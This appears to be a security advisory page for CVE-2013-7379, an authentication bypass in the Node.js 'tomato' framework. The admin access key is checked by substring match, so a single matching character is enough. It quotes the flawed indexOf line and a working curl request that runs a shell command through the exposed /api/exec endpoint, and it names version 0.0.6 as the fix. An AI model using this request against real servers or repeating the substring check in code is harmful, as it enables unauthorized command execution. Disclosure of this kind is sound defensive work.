API Admin Auth Weakness Affecting tomato package, versions <0.0.6
Threat Intelligence
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDnpm:tomato:20130307
- published7 Mar 2013
- disclosed7 Mar 2013
- creditAdam Baldwin
Introduced: 7 Mar 2013
CVE-2013-7379 (opens in a new tab)Overview
Tomato is a Node.js web framework.
The tomato API has an admin service that is enabled by setting up an access_key in the config options. This access_key is intended to protect the API admin from unauthorized access.
The key is checked by checking to see if the access_key provided in the request is within the configured access_key string, not equal to. So a single character that's within the access key is sufficient to bypass this control.
Source: Node Security Project
Details
Example:
This is the snippet of code that does the comparison to authorize requests.
if (access_key && config.master.api.access_key.indexOf(access_key) !== -1) {
For an access_key that is set to anything that includes the letter 'a' the following request would be authorized.
$ curl -X POST "http://localhost:8081/api/exec" -H "Content-Type: application/json" -d @test -H "access-key: a"
{
"cmd": "ls",
"path": ".",
"stdout": "app.js\nconfig.js\nlog\nnode_modules\nserver.js\n",
"stderr": ""
}
Mitigating factors:
The admin interface is disabled by default. The module author confirmed that the access_key should really be an array of access_keys, however based on variable name and documentation it was not clear that it should be an array. The vulnerability exists only if a string access_key is set.
Module version 0.0.6 has been updated to ensure an array of keys is provided as well as documentation updates.